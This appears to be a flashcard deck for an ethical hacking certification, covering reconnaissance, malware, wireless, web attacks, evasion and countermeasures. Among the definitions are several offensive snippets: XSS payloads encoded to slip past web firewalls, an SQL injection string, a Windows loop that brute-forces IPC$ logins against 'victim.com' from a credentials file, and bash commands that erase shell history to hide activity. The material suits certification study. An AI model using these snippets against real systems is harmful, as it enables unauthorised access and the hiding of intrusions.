Which solution can be used to emulate computer services, such as mail and ftp, and to capture information related to logins or actions? -DeMilitarized Zone (DMZ) -Honeypot -Intrusion Detection System (IDS) -Firewall
Banner
Which term is used to refer service announcements provided by services in response to connection requests and often carry vendor's version of information? -Port -Banner -Scanning phase -Network discovery phase
Evasion Technique: Char Encoding
With the char() function, an attacker can encode a common injection variable present in the input string in an attempt to avoid detection in the signature of network security measures. This char() function converts hexadecimal and decimal values into characters that can easily pass through SQL engine parsing. Char() function can be used to inject SQL injection statements into MySQL without using double quotes.
Signature-Based Detection
Work as a rootkit fingerprint. It compares characteristics of all system processes and executable files with a database of known rootkit fingerprints. It can easily detect invisible rootkits by scanning the kernel memory
Footprinting: Traceroute
Work on the concept of ICMP protocol Using TTL field in the header of the ICMP packet to discover routers in path Extract info about network topology, trusted routers, and firewall locations Tools - -Path analyzer pro - delivers network route tracing with performance tests, DNS, Whois, and network resolution to investigate network issues. It shows the route from source to destination graphically. -VisualRoute -Geo Spider -Trout, etc.
Application Proxy
Works as a proxy server and filters connections for specific services. -A proxy service is an application or program that helps forward user requests (for example, FTP or Telnet) to the actual services It is a type of server that acts as an interface between the user workstation and the Internet. A proxy service is available to the user in the internal network, the service on the outside network (Internet) and is transparent. Instead of direct communication between each, they talk with the proxy, and it handles all the communication between users and the internet services. Transparency is the advantage of proxy services.
ARP Spoofing Detection Tools
XARP -A security application that detects ARP-based attacks. -It detects critical network attacks that firewalls cannot cover. -The detection mechanism relies on two techniques: inspection modules and discoverers. -Inspection modules look at ARP packets and check their correctness and validity with respect to the databases they have built up. -Discoverers actively validate IP-MAC mappings and actively detect attackers Capsa Network Analyzer, ArpON ARP AntiSpoofer ARPStraw shARP
Bypass Web App Firewall (WAF) via XSS Attack
XSS attack exploits vulnerabilities that occur while processing input parameters of the end users and the server responses in a web application. Attackers take advantage of these vulnerabilities to inject malicious HTML code in the victim website to bypass the WAF Using ASCII values to bypass WAF -String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41) Using Hex Encoding to bypass WAF -%3C%73%63%69%72%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%6 3%72%69%70%74%3E Using Obfuscation to bypass WAF -In this technique, attackers use a combination of upper and lower case letters alert("XSS") becomes aLeRT("XSS")
OWASP A7: Cross-site Scripting Atk (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or it updates an existing web page with user supplied data using a browser API that can create JavaScript. -It allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites -It occurs when invalidated input data is included in dynamic content that is sent to a user's web browser for rendering. can be used -attack emails -Stealing User cookies -Sending an Unauthorized Request XSSed archive
DHCP Starvation Attack Tools
Yersinia - is a network tool designed to take advantage of some weakness in different network protocols like DHCP. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. -Gobbler, -dhcpstrv, -hyenae -DHCpig
Network Information
You can gather by performing Whois database analysis, trace routing, and so on. Information collected o Domain and sub-domains o Network blocks o IP addresses of the reachable systems o Whois record o DNS records, and related information
System Information
You can gather information by performing network footprinting, DNS footprinting, website footprinting, email footprinting, and so on. Infromation collected o Web server OSes o Location of web servers o Users and passwords and so on.
DNS Enumeration Using Zone Transfer
Zone transfer is the process transferring a copy of the DNS zone file from the primary DNS server to a secondary DNS server. -Done to locate the DNS server and records of the target organization Through this process, an attacker gathers valuable network information such as DNS server names, hostnames, machine names, user names, IP addresses, etc. of the potential targets.
Dynamic Host Configuration Protocol (DHCP)
a client/server protocol that provides an IP address to an IP host Also provides configuration-related information such as the default gateway and subnet mask. When a DHCP client device boots up, it participates in traffic broadcasting.
Risk
a degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or resources, under specified conditions. RISK = Threats x Vulnerabilities x Impact or RISK = Threat × Vulnerability × Asset Value
Hardware Protocol Analyzers
a device that interprets traffic passing over a network. It captures signals without altering the traffic segment. Its purpose is to monitor network usage and identify malicious network traffic generated by hacking software installed on the network. It captures a data packet, decodes it, and analyzes its content according to predetermined rules. It allows an attacker to see the individual data bytes of each packet passing through the network. capable of capturing more data without packet drops at the time of data overload. They are capable of displaying bus states and low-level events such as high-speed negotiation (K/J chirps), transmission errors and retransmissions, etc.
SPECTER
a honeypot or deception system. It simulates a complete system and provides an appealing target to lure hackers away from production systems. It offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it is a trap for an attacker by messing them so that he leaves some traces knowing that they had connected to a decoy system that does none of the things it appears to do; but instead, it logs everything and notifies the appropriate people. It automatically investigates attackers while they are still trying to break in. It provides massive amounts of decoy content, and it generates decoy programs that cannot leave hidden marks on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change regularly without user interaction
Internet Spyware
a utility that allows you to monitor all the web pages accessed by the users on your computer in your absence.
Differential backup
backs up all the changes made since the last full backup.
commands to access the text file from a directory:
c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^ More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^ More? 2>>nul^ More? && echo %time% %date% >> outfile.txt^ More? && echo \\victim.com acct: %i pass: %j >> outfile.txt c:\>type outfile.txt
Where are Hash Passwords Stored in Windows SAM
c:\windows\system32\config\SAM -It stores LAN Manager (LM) or NT LAN Manager (NTLM) hashed passwords -NTLM supersedes the LM hash, which is susceptible to cracking. New versions of Windows still support LM hashes for backward compatibility; -It is not possible to calculate LM hashes for passwords exceeding 14 characters in length. -set to a "dummy" value when a user or administrator sets a password of more than 14 characters.
Integrity-Based Detection
can be regarded as a substitute to both signatures and heuristics based detection. They notify the evidence or presence of malicious activity based on the dissimilarities between the current and baseline snapshots.
Buffer Overflow
common software vulnerabilities that happen due to coding errors allowing attackers to get access to the target system. In an attack, attackers undermine the functioning of programs and try to take the control of the system by writing content beyond the allocated size of the buffer. Insufficient bounds checking in the program is the root cause because of which the buffer is not able to handle data beyond its limit, causing the flow of data to adjacent memory locations and overwriting their data values. Systems often crash or become unstable or show erratic program behavior, when buffer overflow occurs
Runtime Execution Path Profiling
compares runtime execution path profiling of all system processes and executable files. The rootkit adds new code near to a routine's execution path to destabilize it. The method hooks a number of instructions executed before and after a certain routine, as it can be significantly different.
Covering BASH Shell Tracks
export HISTSIZE=0 (disables the BASH shell from saving the history by setting the size of the history file to 0.) history -c (This command is useful in clearing the stored history.) history -w (deletes the history of the current shell,) cat /dev/null > ~.bash_history && history -c && exit shred ~/.bash_history && cat /dev/null > .bash_history && history -c && exit shred ~/.bash_history: This command shreds the history file, making its contents unreadable.
Doxing
gathering and publishing personally identifiable information such as an individual's name and email address, or other sensitive information pertaining to an entire organization.
NetBIOS code: 1D
group, master browser name for the subnet
Proxy Chain
helps an attacker to increase his/her Internet anonymity -the larger the number of proxy servers used, the greater the attacker's anonymity
Dynamic Malware Analysis - Process monitoring
helps in understanding the processes malware initiates and takes over after execution Malware camouflage themselves as genuine Windows services or hide their processes to avoid detection Some malware also use PEs portable executable to inject into various processes as explorer.exe
Extracting Metadata of Public Documents
hidden information about the public documents that can be analyzed in order to obtained information such as title of the page, description, keywords, creation/modification data and time of the content, usernames and e-mail addresses of employees of the target organization. Tools -Metagoofil -extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, and xlsx) belonging to a target company. ExtractMetadata FOCA Meta Tag Analyzer BuzzStream Analyse Metadata Exiftool Web Data Extractor
Cover Medium - Document Stego
hiding secret messages transferred in the form of documents Tools- StegoStick
what kinds of info can you get by querying the NTP server?
host names, IP's, operating systems
Displays all HTTP GET requests
http.request
Discovery Tools
inSSIDer Office WifiExplorer NetSurveyor Xirrus Wi-Fi Inspector Acrylic Wi-Fi Home WirelessMon Ekahau HeatMapper Vistumbler Wi-Fi Scanner Kismet iStumbler AirRadar 4 Wellenreiter NetStumbler AirCheck G2 Wireless Tester
Design Flaws
incorrect encryption or poor validation of data, refer to logical flaws in the functionality of the system that is exploited by the attackers to bypass the detection mechanism and acquire access to a secure system.
Organization Information
information about an organization is available from its website Information collected o Employee details (Employee names, contact addresses, designation, and work experience) o Address and mobile/telephone numbers o Location details o Background of the organization o Web technologies o News articles, press releases, and related documents
GPS spyware
is a device or software application that uses the Global Positioning System (GPS) to determine the location of a vehicle, person, or other attached or installed asset. An attacker can use this software to track the target perso
Desktop spyware
is software that allows an attacker to gain information about a user's activity or gather personal information about the user and send it via the Internet to third parties without the user's knowledge or consent. It provides information regarding what network users did on their desktops, how, and when.
SHODAN Search Engine
is the computer search engine that searches the Internet for connected devices (routers, servers, and IoT.). You can use to discover which devices are connected to the Internet, where they are located and who is using them. good for VoIP
IoT Trojans
is the inter- networking of physical devices, buildings, and other items embedded with electronics a malicious programs that attack the IoT networks and leverage a botnet to attack other machines outside of the IoT network Tools -BricketBot -new malware bricking IoT devices around the world by corrupting their storage capability and reconfiguring kernel parameters. - Mirai - Hajime - LuaBot - Trojan.linux.pnscan
Orthogonal Frequency-division Multiplexing (OFDM)
method of digital modulation of data in which a signal, at a chosen frequency, is split into multiple carrier frequencies that are orthogonal (occurring at right angles) to each other. maps information on the changes in the carrier phase, combination of these, and shares bandwidth with other independent channels. It is also a method of encoding digital data on multiple carrier frequencies.
Misconfiguaration
most common vulnerability that is mainly caused by human error, which allows attackers to gain unauthorized access to the system ways: o An application running with debug enabled o Outdated software running on the system o Running unnecessary services on a machine o Using misconfigured SSL certificates and default certificates o Improperly authenticated external systems o Disabling security settings and features
OpenVAS
multi-svc & multi-tool vulnerability scanner/manager The actual security scanner is accompanied with a regularly updated feed of Network Vulnerability Tests (NVTs), over 50,000 in total
Passive Footprinting Sites
netcraft.com job boards (monster, indeed) social media google hacking
Spy/ MobileSpy! iPhoneOS create files
o *System/Library/LaunchDaemons/com.ms.msd.plist*: this file ensures the msd daemon is run after reboot, and then run permanently. o *System/Library/LaunchDaemons/com.ms.mslocd.plist*: same but for the mslocd daemon. o *User/Library/SMS/sms.db*: this is a SQLite 3 database. messages, the spyware's version, and various internal counters. o *User/Library/CallHistory/call_history.db*: same as sms.db but for call logs. o *usr/libexec/msd*: the main spyware daemon o *usr/libexec/mdlocd*: location manager daemon o var/mobile/.ll.dat
Wi-Fi Protected Access (WPA) Encryption
o 802.11i o RC4 stream cipher o TKIP (Temporal Key Integrity Protocol) -includes per-packet mixing, msg integrity checks, extended IVs (up to 48 bits) and re-keying mechanisms -Uses 128-bit keys for each packet
Wireless Enryption Algorthims
o 802.11i: It is an IEEE amendment that specifies security mechanisms for 802.11 wireless networks. - LEAP: It is a proprietary version of EAP developed by Cisco. - TKIP: A security protocol used in WPA as a replacement for WEP. - AES: It is a symmetric-key encryption, used in WPA2 as a replacement of TKIP. - CCMP: It is an encryption protocol used in WPA2 for stronger encryption and authentication. - WPA2 Enterprise: It integrates EAP standards with WPA2 encryption. - EAP: Supports multiple authentication methods, such as certificates, etc. - RADIUS: It is a centralized authentication and authorization management system. - PEAP: It is a protocol that encapsulates the EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel.
Wireless Threats
o Access control attacks o Integrity attacks o Confidentiality attacks o Availability attacks o Authentication attacks
How to determine sequence numbers.
o Sniff the traffic - finding the ACK packet and then determining the next sequence number based on the ACK packet. o Transmit the data with guessed sequence numbers (not reliable).
WEP/WPA Cracking Tool for Mobile
o WIBR - WIFI BRUTEFORCE HACK -It discovers weak passwords. WIBR+ supports queuing, custom dictionaries, brute force generator, and advanced monitoring o WIFI WPS WPA TESTER o iWep PRO o AndroDumpper (WPS Connect) o Wifi Password WPA-WEP FREE o WPS WPA WiFi Tester
Countermeasure for Wen Application Hacking
o Web Application Fuzz Testing o Source code review - used to detect bugs and irregularities in the developed web applications. o Encoding Schemes
Native libraries
o WebKit and Blink—web browser engine to display HTML content o Open Max AL—it is a companion API to OpenSL ES but is used for multimedia (video and audio) rather than audio only o Libc—Comprises System C libraries o Media Framework—provides media codecs that allows recording and playback of different media formats o Open GL | ES—is a 3D graphics library o Surface Manager—meant for display management o SQLite—a database engine used for data storage purposes o FreeType—meant for rendering fonts o SGL—is a 2D graphics library o SSL—meant for Internet security
Wired Equivalent Privacy (WEP) Encryption
o weak encryption (stack encrytion key) o 802.11b o 24-bit initialization vector (IV) in RC4 The length of the WEP and the secret key are: - 64-bit WEP uses a 40-bit key - 128-bit WEP uses a 104-bit key size - 256-bit WEP uses 232-bit key size
Ack Flag probe scanning
probe scanning exploits the vulnerabilities within BSD derived TCP/IP stack multiple methods TTL version - if TTL of RST packet is less than 64, port is open if its greateer port i closed ( Window version - if the RST packet is anything other than 0, port open - Can be used to check filtering. If sent and no response, stateful firewall present., filtered. Can evade IDS in most cases nmap -sA (ACK scan) nmap -sW (Window scan)
two types of SNMP passwords:
read community string (public) -Configuration of the device or system can be viewed with the help of this password. read/write community string (private) -Configuration on the device can be changed or edited using this password.
Authenticity
refers to the characteristic of a communication, document, or any data that ensures the quality of being genuine or uncorrupted. -he major role of authentication is to confirm that a user is genuine, one who he / she claims to be
IT Security Program Managers and Computer Security Officers (ISSO)
responsible for an organization's information security programs. - provides the required support to the information system owners with the selection of the security controls for protecting the system. - They also play an important role in the selection and the amendment of the security controls in an organization.
Chief Information Officer (CIO)
responsible for executing the policies and plans required for supporting the information technology and computer systems of an organization. -The main responsibility is to train employees and other executive management regarding the possible risks in IT and its effect on business. -This person is also responsible for IT planning, budgeting, and performance based on a risk management program and plays a vital role in the formation of basic plans and policies for risk management.
Tools to Create Rainbow Tables
rtgen- Command line needing several parameters to generate rainbow table Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index Winrtgen- GUI rtgen -graphical rainbow tables generator that helps attackers to create rainbow tables from which they can crack the hashed password.
PL/SQL Exploitation
similar to stored procedure is vulnerable to various SQL injection attacks. Has same vulnerabilities similar to dynamic queries that integrate user input at run-time. Can be exploited in two different ways: -Exploiting Quotes - if an attacker injects malicious input such as 'x' OR '1'='1' into the user password field, the modified query given in the procedure returns a row without providing a valid password -Exploitation by Truncation -An attacker may use in-line comments to bypass certain parts of SQL statement. The attacker uses in-line comments along with username
Cover Medium - Image Stego
the user hides the information in image files of different formats such as .PNG, .JPG, .BMP, etc. Tools- OpenStego
Spectrum Analyzing Tools
tools perform RF Spectrum Analysis and Wi-Fi troubleshooting. o Wi-Spy and Chanalyzer o AirMagnet Spectrum XT o Cisco Spectrum Expert o USB Spectrum Analyzer o AirSleuth-Pro o BumbleBee-LX Spectrum Analyzer o WiFi Surveyor
Sets a filter for the HEX values of 0x33 0x27 0x58 at any offset
udp contains 33:27:58
NetBIOS code: 1B
unique, identifies primary domain controller (PDC)
Cover Medium - Video Stego
use this when there is a need to hide large amounts of data inside carrier files. Discrete Cosine Transform (DCT) manipulation adds secret data to carrier video file at the time of the transformation process of video Tool - OmniHide Pro
Network Security Controls
used to ensure the confidentiality, integrity, and availability of the network services. Access Control Identification Authentication Authorization Accounting Cryptography Security Policy
Application Shimming
used to provide compatibility between older and newer versions of windows. Ex...Run as windows xp and to provide a buffer between the program and OS -can use these shims to perform different attacks such as disabling Windows defender, privilege escalation, installing backdoors, and so on. . All the shims installed by default Windows installer (sbinst.exe) are stored at %WINDIR%\AppPatch\sysmain.sdb hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress) etc. An attacker can use these shims to perform different attacks such as disabling Windows defender, privilege escalation, installing backdoors, etc
SNMP Enumeration Tools
used to scan a single IP address or a range of IP addresses of SNMP enabled network devices in order to monitor, diagnose, and troubleshoot security threats. OpUtils Enigneers Toolset Nsauditor Network Security Auditor Net-SNMP Spiceworks Network Monitor NetScanTools Pro OiDViEW SNMP MIB Browser
Short-range communication : Radio Frequency Identification
RFID stores data in tags that are read using electromagnetic fields. RFID is used in many sectors like industrial, offices, companies, automobile, pharmaceuticals, livestock and pets.
Locky
Ransomeware A dreadful data encrypting parasite that not only infects the computer system but also has the ability to corrupt data on unmapped network shares. spreads as a malicious Word document named invoice J-[8 random numbers].doc that is attached to spam email
Wire Sniffing
Recording raw network traffic (shown in plaintext unless encrypted) known as wiretapping in which hackers sniff credentials during transit by capturing Internet packets. With packet sniffing, an attacker can gain passwords such as Email, websites, SMB, FTP, rlogin sessions or SQL -gather packets at the Data Link Layer
Tools for Executing Applications
RemoteExec- remotely installs apps or scripts and allows attacker to modify the registry, change local admin passwords, or disable accounts -PDQ Deploy -PSExec -TheFatRat -Dameware Remote Support -ManageEngine Desktop Central
Countermeasures: Accounts
Remove all unused modules and application extensions. Disable unused default user accounts created during installation of an OS. When creating a new web root directory, grant the appropriate (least possible) NTFS permissions to the anonymous user being used from the IIS web server to access the web content. Eliminate unnecessary database users and stored procedures and follow the principle of least privilege for the database application to defend against SQL query poisoning. Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms including URL authorization. Slow down brute force and dictionary attacks with strong password policies, and then audit and alert for logon failures. Run processes using least privileged accounts as well as least privileged service and user accounts.
SNMP enumeration countermeasures:
Remove the SNMP agent or turn off the SNMP service If shutting off SNMP is not an option, then change the default community string names Upgrade to SNMP3, which encrypts passwords and messages Implement the Group Policy security option called "Additional restrictions for anonymous connections" Ensure that the access to null session pipes, null session shares, and IPSec filtering is restricted Block access to TCP/UDP ports 161 Do not install the management and monitoring Windows component unless it is required. Encrypt or authenticate using IPSEC
Pen Test: Covering Tracks
Remove web activity tracks such as MRU, cookies, cache, temporary files and history using Clear_Event_Viewer_Logs.bat utility and meterpreter shell Disable auditing using tool such as Auditpol Tamper log files such as event log files, server log files and proxy log files by log poisoning or log flooding Use commands like history -c, cat /dev/null > ~.bash_history&& history -c && exit, etc. to clear BASH shell tracks Cover tracks on network using Reverse HTTP Shells, Reverse ICMP Tunnels, and TCP Parameters Use track covering tools such as CCleaner, AVG TuneUp, Privacy Eraser, Wipe, BleachBit, etc.
UDP 161
SNMP (Simple Network Management Protocol) -monitor network attached devices such as routers, switches, firewalls, printers, servers, etc. -The agent receives requests on this port from the managers, and responds to the managers on Port 162
TCP/UDP 162
SNMP (Trap) - Simple Network Management Protocol Trap -uses TCP/UDP port 162 to receive notifications such as optional variable bindings, sysUpTime value, etc., from agent to manag
SSL protocol also offers _________________ with three basic properties
"channelsecurity" Properties o Private channel - All the messages are encrypted after a simple handshake is used to define a secret key. o Authenticated channel - The server endpoint of the conversation is always encrypted, whereas the client endpoint is optionally authenticated. o Reliable channel -message transfer has an integrity check.
RPC Enumeration
(Remote Procedure Call) is a technology used for creating distributed client/server programs. -allows client and server to communicate in distributed client/server programs. It is an inter-process communication mechanism Generally consists of components like client, server, endpoint, endpoint mapper, client stub and server stub along with various dependencies. You can use the following Nmap scan commands to identify the RPC service running on the network. - nmap -sR <target IP/network> - nmap -T4 -A <target IP/network>
Dictionary Attack
(active online attack) -the text file that contains a number of dictionary words that are commonly used as passwords. The program uses every word present in the dictionary to find the password. They have added entries with numbers and symbols added to words (e.g., "3December!962"). Simple keyboard finger rolls ("qwer0987") does not work in systems using passphra
Blackhat SEO
(also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, doorway pages, page swapping, and adding unrelated keywords to get higher search engine ranking for their malware pages.
Blind SQL Injection: Boolean Exploitation
(sometimes called inferential SQL Injection) this is performed by asking the right questions to the application database
Wireless Standards
*802.11 (Wi-Fi) applies to wireless LANs* o *802.11a* - 5 GHz, 54 Mbps by using Orthogonal Frequency Division Multiplexing (OFDM) -more sensitive to walls and other obstacles o *802.11b* - 2.4 GHz, 11 Mbps by using direct-sequence spread spectrum DSSS modulation. o *802.11d* is an enhanced version of 802.11a and 802.11b. -The standard supports regulatory domains. -Can be set at the media access control (MAC) layer o 802.11e: It is used for real-time applications such as voice, VoIP, and video. -Quality of Service (QoS) to Layer 2 o *802.11g* - 54 Mbps using the OFDM technology and uses the same 2.4 GHz band as 802.11b. - defines high-speed extensions to 802.11b. -compatible with the 802.11b standard o *802.11ac* - 5 GHz. -Faster and more reliable than the 802.11n - involves Gigabit networking that provides an instantaneous data transfer experience. o *802.11i* -improves WLAN security by implementing new encryption protocols such as TKIP and AES o *802.11ad* - 60 GHz -inclusion of a new physical layer -operating on 2.4 GHz and 5 GHz. - speed is much higher than that of 802.11n. o *802.15*: It defines the standards for a wireless personal area network (WPAN). It describes the specification for wireless connectivity with fixed or portable devices o *802.15.1* - Bluetooth is mainly used for exchanging data over short distances on fixed and mobile devices. This standard works on a 2.4 GHz ban o 802.15.4 (ZigBee), 802.15.5 (mesh network), 802.16 (WiMax), 802.11X (RADIUS)
Fake Antivirus Tools
- AntiVirus Pro 2017 This program is classified as a rogue because it deliberately displays false scan results, fake security alerts, and prevents from running any programs on the computer If you attempt to remove any of these so-called infections, it will state to purchase the program to remove anything. - ScanGuard - Antivirus 10 - TotalAV - SpeedUpMyPC 2016
Malware is developed and used for
- Attack browsers and track websites visited - Affect system performance, making it very slow - Cause hardware failure, rendering computers inoperable - Steal personal information, including contacts - Erase valuable information, resulting in the substantial data losses - Attack additional computer systems directly from a compromised system - Spam inboxes with advertising emails
Common Techniques Attackers Use to Distribute Malware on the Web
- Blackhat Search Engine Optimization (SEO): - Social Engineered Click-jacking: - Spearphishing Sites: - Malvertising - Compromised Legitimate Web sites - Drive-by Downloads - Spam Emails:
System and Information Owner
-They mainly monitor the plans and policies developed for information systems. -They are responsible for the appropriate security control used to maintain confidentiality, integrity and availability for an information system.
Firewall Limitations
- Firewalls can restrict users from accessing valuable services like FTP, Telnet, NIS, etc. and sometimes restricts Internet access as well. - The firewall cannot protect from internal attacks (backdoor) in a network. For example, a disgruntled employee who cooperates with the external attacker. - The firewall concentrates its security at one single point which makes other systems within the network prone to security attacks. - A bottleneck could occur if all the connections pass through the firewall. - The firewall cannot protect the network from social engineering and data-driven attacks where the attacker sends malicious links and emails to employees inside the network. - If external devices such as a laptop, mobile phone, portable hard drive, etc. are already infected and connected to the network, then a firewall cannot protect the network from these devices. - The firewall is unable to adequately protect the network from all types of zero-day viruses that try to bypass it. - A firewall cannot do anything if the network design and configuration is faulty. - A firewall is not an alternative to antivirus or antimalware. - A firewall does not block attacks from a higher level of the protocol stack. - A firewall does not protect against attacks originating from common ports and applications. - A firewall does not protect against attacks from dial-in connections. - A firewall is unable to understand tunneled traffic.
DDoS Application Layer attacks
- HTTP flood attack - Slowloris attack
Methods to Compromise a Web Server
- Improper file and directory permissions - Installing the server with default settings - Unnecessary services enabled, including content management and remote administration - Security conflicts with business ease-of-use case - Lack of proper security policy, procedures, and maintenance - Improper authentication with external systems - Default accounts with their default or no passwords - Unnecessary default, backup, or sample files - Misconfigurations in web server, OS, and networks - Bugs in server software, OS, and web applications - Misconfigured SSL certificates and encryption settings - Administrative or debugging functions that are enabled or accessible on web servers - Use of self-signed certificates and default certificates
Characteristics of Viruses
- Infects other programs - Transforms itself - Encrypts itself - Alters data - Corrupts files and programs - Self-replication
Purposes for creating a Virus
- Inflict damage to competitors - Financial benefits - Vandalism - Play prank - Research project - Cyberterrorism - Distribute political messages - Damage network or computers - Gain remote access of the victim's computer
IDS Evasion Techniques
- Insertion Attack - Evasion - Denial-of-Service Attack - Obfuscating - False Positive Generation - Session Splicing - Unicode Evasion - Fragmentation Attack - Overlapping Fragments - Time-To-Live Attacks - Invalid RST Packets - Urgency Flag - Polymorphic Shellcode - ASCII Shellcode - Application-Layer Attacks - Desynchronization - Encryption - Flooding
Virus and Worm Countermeasures
- Install anti-virus software that detects and removes infections as they appear - Generate an anti-virus policy for safe computing and distribute it to the staff - Pay attention to the instructions while downloading files or any programs from the Internet - Update anti-virus software regularly - Avoid opening attachments received from an unknown sender as viruses spread via e-mail attachments - Since virus infections can corrupt data, ensure you are performing regular data backups - Schedule regular scans for all drives after the installation of anti-virus software - Do not accept disks or programs without checking them first using a current version of an anti-virus program - Ensure that any executable code used within the organization has been approved - Do not boot the machine with infected bootable system disk - Stay informed about the latest virus threats - Check DVDs and CDs for virus infection - Ensure pop-up blockers are turned on and use an Internet firewall - Run disk clean up and registry scanner once a week - Run anti-spyware or adware once a week - Do not open files with more than one file type extension - Be cautious with files being sent through instant messenger applications
Different Ways a Malware can Get into a System
- Instant Messenger Applications - Portable Hardware Media /Removable Devices - Browser and Email Software Bugs - Insecure Patch management - Rogue/Decoy Applications - Untrusted Sites and Freeware Web Applications/Software - Downloading Files from Internet - Email Attachments - File Shareing -Network Propagation -Installation by other Malware -Bluetooth and wireless networks
Backdoor Countermeasures
- Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage - Educate users not to install applications downloaded from untrusted Internet sites and email attachments - Avoid untrusted software and ensure that a firewall protects every device - Use anti-virus tools such as McAfee, Norton, etc. to detect and eliminate backdoors - Track the open-source projects that enter the enterprise from untrusted external sources, such as open-source code repositories, etc. - Inspect network packets using protocol monitoring tools
Hardware Protocol Analyzer Tools
- N2X N5540A Agilent Protocol Analyzer - manufacturers (NEMs), and component manufacturers can verify service attributes of the entire networks end-to-end, while also isolating problems down to individual networking devices and subsystems. Two different types of card can be configured simultaneously allowing for test scenarios that use a combination of port types. - Keysight E2960B - Tests as well as debugs. It includes a protocol analyzer that supports x1 through x16 link widths, with intuitive spreadsheet style visualization. It offers EASY flow and context-sensitive display for a clear protocol viewing. - RADCOM, - STINGA, - NETSCOUT, - Keysight/Agilent
Session Hijacking in OSI Model
- Network Level Hijacking - Application Level Hijacking Usually, network-level and application-level session hijacking occur together this is so because a successful network-level session hijacking provides an attacker with ample information to perform the application-level session hijacking. Application-level session hijacking relies on HTTP sessions.
Dangerous Security Flaws Affecting Web Server Security
- Not updating the web server with the latest patches - Using the same system admin credentials everywhere - Allowing unrestricted internal and outbound traffic - Running unhardened applications and servers - Complacency
Anonymizer Tools for Mobile
- Orbot -It uses Tor to encrypt Internet traffic and then hides it by bouncing through a series of computers around the world -Psiphon -that utilizes VPN, SSH, and HTTP Proxy. Psiphon does not increase online privacy and is not an online security tool. -OpenDoor -an app designed for both iPhone and iPad; it allows you to browse websites smoothly and anonymously.
Additional Sniffing Tools
- PRTG Network Monitor - Colasoft Packet Builder - RSA NetWitness Investigator - tcpdump - NetFlow Analyzer - CommView - NetResident - ntopng - SmartSniff - Free Network Analyzer - CSniffer - EtherApe - Network Probe
Firewall Technologies
- Packet Filtering (L2-4) - Circuit Level Gateways (L5) - Application Level Firewall (L7) - Stateful Multilayer Inspection (L3) - Application Proxies (L7) - Virtual Private Network (All but Layer 1) - Network Address Translation (L3)
Intrusion Detection System (IDS) Pen Testing
- Perform obfuscating technique to encode attack packets that IDS would not detect, but an IIS web server would decode and become attacked - Try to bypass IDS by hiding attack traffic in a large volume of false positive alerts (false positive generation attack) - Use session splicing technique to bypass IDS by keeping the session active for a longer time than the IDS reassembly time - Try Unicode representations of characters to evade the IDS signature - Perform fragmentation attack with IDS fragmentation reassembly timeout less and more than that of the Victim - Perform overlapping fragment technique to craft a series of packets with TCP sequence numbers configured to overlap - Try invalid RST packets technique to bypass IDS as it prevents IDS from processing the stream - Perform urgency flag evasion technique to evade IDS as some IDSs do not consider the TCP protocol's urgency feature - Try to bypass IDS by encrypting the shellcode to make it undetectable to IDS (polymorphic shellcode technique) - Try to evade IDS pattern matching signatures by hiding the shellcode content using ASCII codes (ASCII shellcode technique) - Perform application layer attacks as many IDSs fail to check the compressed file formats for signatures - Establish an encrypted session with the victim or send loads of unnecessary traffic to produce noise that cannot be analyzed by the IDS
Techniques to bypass a Firewall
- Port Scanning - Firewalking - Banner Grabbing - IP Address Spoofing - Source Routing - Tiny Fragments - Using IP Address in Place of URL - Using Anonymous Website Surfing Sites - Using Proxy Server - ICMP Tunneling - ACK Tunneling - HTTP Tunneling - SSH Tunneling - Through External Systems - Through MITM Attack - Through Content - Through XSS Attack
Techniques to Defend against Botnets
- RFC 3704 Filtering - Cisco IPS Source IP Reputation Filtering - Black-Hole Filter - DDoS Prevention Offerings from ISP or DDoS Service
DDoS Protocol Attack techniques
- SYN flood attack - ACK flood attack - TCP connection flood attack - TCP state exhaustion attack - Fragmentation attack - RST attack
Countermeasures: Patches and Updates
- Scan for existing vulnerabilities, patch, and update the server software regularly. - Before applying any service pack, hotfix, or security patch, read and peer review all relevant documentation. - Apply all updates, regardless of their type on an "as-needed" basis. - Test the service packs and hotfixes on a representative non-production environment prior to being deployed to production. - Ensure that service packs, hotfixes, and security patch levels are consistent on all Domain Controllers (DCs). - Ensure that server outages are scheduled and a complete set of backup tapes and emergency repair disks are available. - Have a back-out plan that allows the system and enterprise to return to their original state, prior to the failed implementation. - Schedule periodic service pack upgrades as part of operations maintenance and never try to have more than two service packs behind.
Defend Against IDS Evasion
- Shut down switch ports associated with the known attack hosts. - Perform an in-depth analysis of ambiguous network traffic for all possible threats. - Use TCP FIN or Reset (RST) packet to terminate malicious TCP sessions. - Look for the nop opcode other than 0x90 to defend against the polymorphic shellcode problem. - Train users to identify attack patterns and regularly update/patch all the systems and network devices. - Deploy IDS after a thorough analysis of network topology, nature of network traffic, and the number of hosts to monitor. - Use a traffic normalizer to remove potential ambiguity from the packet stream before it reaches to the IDS. - Ensure that IDSs normalize fragmented packets and allow those packets reassembled in the proper order. - Define DNS server for client resolver in routers or similar network devices. - Harden the security of all communication devices such as modems, routers, etc. - If possible, block ICMP TTL expired packets at the external interface level and change the TTL field to a considerable value, ensuring that the end host always receives the packets. - Regular update of antivirus signature database. - Use a traffic normalization solution at the IDS to prevent the system against evasions. - Store the attack information (attacker IP, victim IP, timestamp) for future analysis.
Goals behinh Web Server Attacks
